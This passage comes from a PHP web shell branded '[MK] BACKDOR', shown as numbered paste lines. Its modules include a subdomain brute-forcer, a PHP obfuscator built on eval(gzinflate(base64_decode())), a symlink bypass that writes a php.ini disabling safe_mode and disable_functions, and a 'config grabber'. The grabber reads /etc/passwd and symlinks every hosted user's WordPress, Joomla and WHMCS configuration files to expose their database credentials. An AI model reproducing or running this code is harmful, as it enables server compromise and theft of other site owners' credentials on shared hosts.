ress","print","printer","private","project","projects","proxy","public","ra","radio","raptor","ras","read","register","remote","report","reports","root","router","lister","rwhois","sac","schedules","scotty","search","secret","secure","security","seri","serv","serv2","server","service","services","shop","shopping","site","sms","smtp","smtphost","snmp","snmpd","snort","solaris","1","2","3","4","5","6","7","8","9","0","solutions","support","source","sql","ssl","stats","store","stream","streaming","sun","support","switch","sysback","system","tech","terminal","test","testing","testing123","time","tivoli","training","transfers","uddi","update","upload","uploads","video","vpn","w1","w2","w3","wais","wap","web","webdocs","weblib","weblogic","webmail","webserver","webservices","websphere","whois","wireless","work","world","write","ws","ws1","ws2","ws3","www1","www2","www3","www4","www5","www6","www7","www8","www9","drupal","wordpress","joomla","db","database","love");
  3672. if($_POST){
  3673. $url = $_POST["site"];
  3674. foreach($subs as $sub){
  3675. if(!eregi($url, gethostbyname($sub.".".$url))){
  3676. echo '<font face="Narkisim" color="white">[+] '.$sub.".".$url.' : </font><font color="#0078FF">'.gethostbyname($sub.".".$url).'</font></br>';
  3677. }else{
  3678. echo '<span style="font-size:11px;  color:white">'.$sub.".".$url.' </span>: <span style="font-size:11px;color:#f60000">NOTHING FOUND</spane><br><br>';
  3679. }
  3680. }
  3681. }
  3682. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  3683. echo ''. $FOTTER2 .'' ;
  3684. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3685. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3686. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3687. $SERVERIP1 = "SERVER IP :";
  3688. echo ''. $SERVERIP1 .'' ;
  3689. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3690. $SPAN3 = "</span>";
  3691. echo ''. $SPAN2 .'' ;
  3692. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3693. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3694. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3695. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3696. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3697. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3698. $HOSTOWNED1 = "HOST OWNED :";
  3699. echo ''. $HOSTOWNED1 .'' ;
  3700. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3701. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3702. echo ''. $REPORTERROR .'</a></span></footer>';
  3703. echo ''. $THEEND .'' ;
  3704. exit;}
  3705. ////////////
  3706. if ($_GET['Mister'] == 'string'){$text = $_POST['code'];
  3707. echo '<br><center><nav class="social"><ul>
  3708. <li><a href="?Mister=string">Encoder</a></li>
  3709. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  3710. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  3711. <li><a href="?Mister=HashId">Hash Identification</a></li>
  3712. </ul></nav></center>';
  3713. ?>
  3714. <nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>ENCODER</span></nav><br><div class=content><center><span style='font-size:11px;color:white'>MD5 / BASE64 / CRYPT / URL Encoding / SHA256 / MD4</span><center>
  3715. <center><br>
  3716. <table align='center'  style="width:50%;"></td><td>
  3717. <form method="post"><br><textarea cols=80 rows=5 name="code" class="input" style="height:100px; width:100%;">MKV3.2</textarea><br><br><select  name="ope"><option value="base64">BASE64</option><option value="md5">MD5</option><option value="whash">CRYPT</option><option value="SHA1">SHA1</option><option value="urlencode">URL Encoding</option><option value="md4">MD4</option><option value="SHA256">SHA256</option></select>&nbsp;<input type='submit' value='ENCRYPT' class="Mister-button"></form><?php $op = $_POST["ope"];switch ($op) {case 'base64': $codi=base64_encode($text);break;case 'md5' : $codi=md5($text);break;case 'whash' : $codi=crypt($text);break;case 'SHA1' : $codi=sha1($text);break;case 'urlencode' : $codi=urlencode($text);break;case 'md4' : $codi=hash("md4",$text);break;case 'SHA256' : $codi=hash("sha256",$text);break;default:break;}echo '<textarea cols=80 rows=10 class="input" style="height:100px; width:100%;" readonly>'.$codi.'</textarea></div></center>';
  3718. $FOTTER2 = "<footer class='MK-footer'>";  
  3719. echo ''. $FOTTER2 .'' ;
  3720. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3721. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3722. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3723. $SERVERIP1 = "SERVER IP :";
  3724. echo ''. $SERVERIP1 .'' ;
  3725. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3726. $SPAN3 = "</span>";
  3727. echo ''. $SPAN2 .'' ;
  3728. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3729. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3730. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3731. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3732. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3733. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3734. $HOSTOWNED1 = "HOST OWNED :";
  3735. echo ''. $HOSTOWNED1 .'' ;
  3736. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3737. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3738. echo ''. $REPORTERROR .'</a></span></footer>';
  3739. echo ''. $THEEND .'' ;
  3740. exit;}
  3741. if ($_GET['Mister'] == 'obfuscate') {
  3742. echo '<br><center><nav class="social"><ul>
  3743. <li><a href="?Mister=string">Encoder</a></li>
  3744. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  3745. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  3746. <li><a href="?Mister=HashId">Hash Identification</a></li>
  3747. </ul></nav></center>
  3748. ';?>
  3749. <nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>PHP OBFUSCATE</span></nav><br><div class=content><center><span style='font-size:11px;color:white'>TYPE CODE PHP</span><center>
  3750. <?php
  3751. if ( isset($_POST['code']) &&
  3752. $_POST['code'] != '')
  3753. {
  3754. $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
  3755.         $encode = '
  3756. <?php
  3757. $encoded = \''.$encoded.'\';
  3758. eval(gzinflate(base64_decode($encoded)));
  3759. ///// SCRIPT ENCODED BY [MK] BACKDOR
  3760. ///// CODED BY MISTER KLIO TWITTER @MCAZEDIINE
  3761. ?>
  3762. ';
  3763. }
  3764. else
  3765. {
  3766. $encode = 'PLEASE ENTER YOUR CODE! AND CLICK SUBMIT! :)';    
  3767. }
  3768. ?>
  3769. <center><form method="POST" style="width:80%;">
  3770. <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
  3771. <input class="Mister-button" type="submit" value="ENCODER"/>
  3772. </form></center>
  3773. <?php
  3774. $FOTTER2 = "<footer class='MK-footer'>";  
  3775. echo ''. $FOTTER2 .'' ;
  3776. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3777. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3778. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3779. $SERVERIP1 = "SERVER IP :";
  3780. echo ''. $SERVERIP1 .'' ;
  3781. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3782. $SPAN3 = "</span>";
  3783. echo ''. $SPAN2 .'' ;
  3784. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3785. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3786. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3787. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3788. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3789. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3790. $HOSTOWNED1 = "HOST OWNED :";
  3791. echo ''. $HOSTOWNED1 .'' ;
  3792. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3793. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3794. echo ''. $REPORTERROR .'</a></span></footer>';
  3795. echo ''. $THEEND .'' ;
  3796. exit;}
  3797. if ($_GET['Mister'] == 'HashId') {
  3798. echo '<br><center><nav class="social"><ul>
  3799. <li><a href="?Mister=string">Encoder</a></li>
  3800. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  3801. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  3802. <li><a href="?Mister=HashId">Hash Identification</a></li>
  3803. </ul></nav></center>
  3804. ';
  3805. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF;'>HASH IDENTIFICATION</span></nav><center>";   
  3806. if(isset($_POST['gethash'])){
  3807.         $hash = $_POST['hash'];
  3808.         if(strlen($hash)==32){
  3809.             $hashresult = "MD5 Hash";
  3810.         }elseif(strlen($hash)==40){
  3811.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3812.         }elseif(strlen($hash)==13){
  3813.             $hashresult = "DES(Unix) Hash";
  3814.         }elseif(strlen($hash)==16){
  3815.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3816.         }elseif(strlen($hash)==41){
  3817.             $GetHashChar = substr($hash, 40);
  3818.             if($GetHashChar == "*"){
  3819.                 $hashresult = "MySQL5 Hash";
  3820.             }  
  3821.         }elseif(strlen($hash)==64){
  3822.             $hashresult = "SHA-256 Hash";
  3823.         }elseif(strlen($hash)==96){
  3824.             $hashresult = "SHA-384 Hash";
  3825.         }elseif(strlen($hash)==128){
  3826.             $hashresult = "SHA-512 Hash";
  3827.         }elseif(strlen($hash)==34){
  3828.             if(strstr($hash, '$1$')){
  3829.                 $hashresult = "MD5(Unix) Hash";
  3830.             }  
  3831.         }elseif(strlen($hash)==37){
  3832.             if(strstr($hash, '$apr1$')){
  3833.                 $hashresult = "MD5(APR) Hash";
  3834.             }  
  3835.         }elseif(strlen($hash)==34){
  3836.             if(strstr($hash, '$H$')){
  3837.                 $hashresult = "MD5(phpBB3) Hash";
  3838.             }  
  3839.         }elseif(strlen($hash)==34){
  3840.             if(strstr($hash, '$P$')){
  3841.                 $hashresult = "MD5(Wordpress) Hash";
  3842.             }  
  3843.         }elseif(strlen($hash)==39){
  3844.             if(strstr($hash, '$5$')){
  3845.                 $hashresult = "SHA-256(Unix) Hash";
  3846.             }  
  3847.         }elseif(strlen($hash)==39){
  3848.             if(strstr($hash, '$6$')){
  3849.                 $hashresult = "SHA-512(Unix) Hash";
  3850.             }  
  3851.         }elseif(strlen($hash)==24){
  3852.             if(strstr($hash, '==')){
  3853.                 $hashresult = "MD5(Base-64) Hash";
  3854.             }  
  3855.         }else{
  3856.             $hashresult = "HASH TYPE NOT FOUND";
  3857.         }
  3858.     }else{
  3859.         $hashresult = "<span style='color:red;'> NOT HASH ENTERED </span>";
  3860.     }
  3861.     ?>
  3862.     <center>
  3863. <form action="" method="POST"><br><div class='content'>
  3864. <span style='color:#FFFFFF;'> ENTER UR HASH </span> : <br><td><input type="text" name="hash" size='60' style="width:40%;"/></td>
  3865. <br><br><input type="submit" class="Mister-button" name="gethash" value="Identify Hash" ><br><br>
  3866. <span style='color:#FFFFFF;'> RESULT</span> : <span style='color:#0078FF;'><?php echo $hashresult; ?></span><br><br>
  3867.     </table></form>
  3868.     </center>
  3869.     <?php
  3870. $FOTTER2 = "<footer class='MK-footer'>";  
  3871. echo ''. $FOTTER2 .'' ;
  3872. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3873. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3874. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3875. $SERVERIP1 = "SERVER IP :";
  3876. echo ''. $SERVERIP1 .'' ;
  3877. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3878. $SPAN3 = "</span>";
  3879. echo ''. $SPAN2 .'' ;
  3880. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3881. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3882. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3883. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3884. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3885. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3886. $HOSTOWNED1 = "HOST OWNED :";
  3887. echo ''. $HOSTOWNED1 .'' ;
  3888. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3889. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3890. echo ''. $REPORTERROR .'</a></span></footer>';
  3891. echo ''. $THEEND .'' ;
  3892. exit;}
  3893.  
  3894. //////////// IP LOOKUP
  3895. if ($_GET["Mister"] == "iplookdom"){
  3896. echo "<br><center><nav class='social'><ul>
  3897. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3898. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3899. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3900. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3901. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3902. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3903. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3904. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3905. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3906. <li><a href='?Mister=whois'>Website Whois</a></li>
  3907. </ul></nav></center>";
  3908. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>IP LOOKUP REVERSE</span></nav><br><div class=content>
  3909. <center>";
  3910. ?>
  3911. <center><br><form><input type='text' size='60' value='<?php echo "".$_SERVER['HTTP_HOST']."";?>' name='Mister' style='width:40%' class='input'/><input type='hidden' name='Mister' value='iplookdom'><br><br><input type='submit' value='CHECK IT' class='Mister-button'></form></center>
  3912. <?php
  3913. if(isset($_GET["Mister"]))
  3914. {
  3915. $site = $_GET["Mister"];
  3916. $Mister = "http://domains.yougetsignal.com/domains.php";
  3917.  
  3918. //Curl Function
  3919. $ch = curl_init($Mister);
  3920. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3921. curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$site&ket=");
  3922. curl_setopt($ch, CURLOPT_HEADER, 0);
  3923. curl_setopt($ch, CURLOPT_POST, 1);
  3924. $resp = curl_exec($ch);
  3925. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3926. $array = explode(",,", $resp);
  3927. unset($array[0]);
  3928. echo "<table style='margin: 0 auto'>";
  3929. foreach($array as $lnk)
  3930. {
  3931.     print "<tr><td><a  style=\"color:#0078FF;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
  3932. }
  3933. echo "</table>";
  3934. curl_close($ch);
  3935. }
  3936. $FOTTER2 = "<footer class='MK-footer'>";  
  3937. echo ''. $FOTTER2 .'' ;
  3938. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3939. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3940. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3941. $SERVERIP1 = "SERVER IP :";
  3942. echo ''. $SERVERIP1 .'' ;
  3943. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3944. $SPAN3 = "</span>";
  3945. echo ''. $SPAN2 .'' ;
  3946. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3947. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3948. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3949. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3950. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3951. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3952. $HOSTOWNED1 = "HOST OWNED :";
  3953. echo ''. $HOSTOWNED1 .'' ;
  3954. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3955. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3956. echo ''. $REPORTERROR .'</a></span></footer>';
  3957. echo ''. $THEEND .'' ;
  3958. exit ;
  3959. }
  3960. ///////////
  3961.  if ($_GET['Mister'] == 'SYMLINK') {
  3962.      $FOTTER2 = "<footer class='MK-footer'>";  
  3963. echo ''. $FOTTER2 .'' ;
  3964. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3965. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3966. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3967. $SERVERIP1 = "SERVER IP :";
  3968. echo ''. $SERVERIP1 .'' ;
  3969. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3970. $SPAN3 = "</span>";
  3971. echo ''. $SPAN2 .'' ;
  3972. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3973. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3974. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3975. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3976. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3977. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  3978. $HOSTOWNED1 = "HOST OWNED :";
  3979. echo ''. $HOSTOWNED1 .'' ;
  3980. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3981. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3982. echo ''. $REPORTERROR .'</a></span></footer>';
  3983. echo ''. $THEEND .'' ;
  3984. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>SYMLINK BYPASS</span></nav><br><div class=content><center>";
  3985. $fp = fopen("php.ini","w+");
  3986. fwrite($fp,"safe_mode = OFF
  3987. Safe_mode_gid = OFF
  3988. disable_functions = NONE
  3989. disable_classes = NONE
  3990. open_baseDIR = OFF
  3991. suhosin.executor.func.whitelist = NONE ");
  3992. echo'<form method="post">
  3993. <input type="text" name="file" value="/home/user/public_html/config.php" style="width:40%" class="input"><br><br>
  3994. <input type="text" name="Files" value="/MK3/config.txt" style="width:40%" class="input"><br /><br />
  3995. <input type="submit" value="BYPASS" name="symlink" class="Mister-button"> <br /><br />
  3996. </form>
  3997. ';
  3998.  
  3999. $fichier = $_POST['file'];
  4000. $Files = $_POST['Files'];
  4001. $symlink = $_POST['symlink'];
  4002.  
  4003. if ($symlink)
  4004. {
  4005.  
  4006.  
  4007. $DIR = "MK3";
  4008. if(FILE_EXISTS($DIR)) {
  4009. echo "<br><span style='font-size:11px;  color:red'> /MK3/ FOLDER ALREADY EXIST </font><br />\n";
  4010. } else {
  4011. @mkDIR($DIR); {
  4012. echo "<br><span color='red'>/MK3/.htaccess FOLDER CREATED </span><br />\n";
  4013. echo "<br><span style='font-size:11px;  color:#FFFFFF'> $Files RETRIEVED SUCCESSFULLY </span><br />\n";
  4014. }
  4015. }
  4016.  
  4017. // Extract Priv8 htaccess File //                                      
  4018. $priv9  = "#Priv9 htaccess
  4019. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  4020. DIRectoryIndex $Files
  4021. ForceType text/plain
  4022. AddType text/plain .php
  4023. AddType text/plain .html
  4024. AddType text/html .shtml
  4025. AddType txt .php
  4026. AddHandler server-parsed .php
  4027. AddHandler txt .php
  4028. AddHandler txt .html
  4029. AddHandler txt .shtml
  4030. Options All
  4031. Options All";
  4032. $f =@fopen ('MK3/.htaccess','w');
  4033. @fwrite($f , $priv9);
  4034.  
  4035. @symlink("$fichier","MK3/$Files");
  4036.  
  4037. echo '<br /><a target="_blank" href="MK3/" >'.$Files.'</a>';
  4038. }
  4039. exit;
  4040. }
  4041. ////////
  4042.  if ($_GET['Mister'] == 'Grabber') {
  4043. echo "<br><center><nav class='social'><ul>
  4044. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  4045. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  4046. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  4047. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  4048. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  4049. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  4050. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  4051. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  4052. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  4053. <li><a href='?Mister=whois'>Website Whois</a></li>
  4054. </ul></nav></center>";
  4055. echo "<nav class='Mister-nav'>
  4056. <center><span style='font-size:18px;  color:#0078FF'>ATTACK CONFIG GRABBER
  4057. </span></nav><br><div class=content><center>";
  4058. ?><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="white" size="2pt">/ETC/PASSWD GET</p><form method="POST" style="width:40%"><textarea name="passwd" rows='15' cols='60' class='input' style="height:200px;"><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" size="100" value="DONE !" type="submit" class="Mister-button"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error> SYMLINK IS DISABLED :( </error>');}@mkDIR('MKConfig', 0755);@chDIR('MKConfig');
  4059. $htaccess="
  4060. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  4061. Options Indexes FollowSymLinks
  4062. ForceType text/plain
  4063. AddType text/plain .php
  4064. AddType text/plain .html
  4065. AddType text/html .shtml
  4066. AddType txt .php
  4067. AddHandler server-parsed .php
  4068. AddHandler txt .php
  4069. AddHandler txt .html
  4070. AddHandler txt .shtml
  4071. Options All
  4072. Options All";
  4073. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "<br><br><center><span style='font-size:11px;  color:#0078FF'>WAIT ...</span></center><br>";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo '<span style="font-size:11px;  color:#0078FF"> DONE ! </span><a target="_blank" href="MKConfig">OPEN CONFIGS</a></span>';}
  4074. $FOTTER2 = "<footer class='MK-footer'>";  
  4075. echo ''. $FOTTER2 .'' ;
  4076. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4077. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4078. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4079. $SERVERIP1 = "SERVER IP :";
  4080. echo ''. $SERVERIP1 .'' ;
  4081. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4082. $SPAN3 = "</span>";
  4083. echo ''. $SPAN2 .'' ;
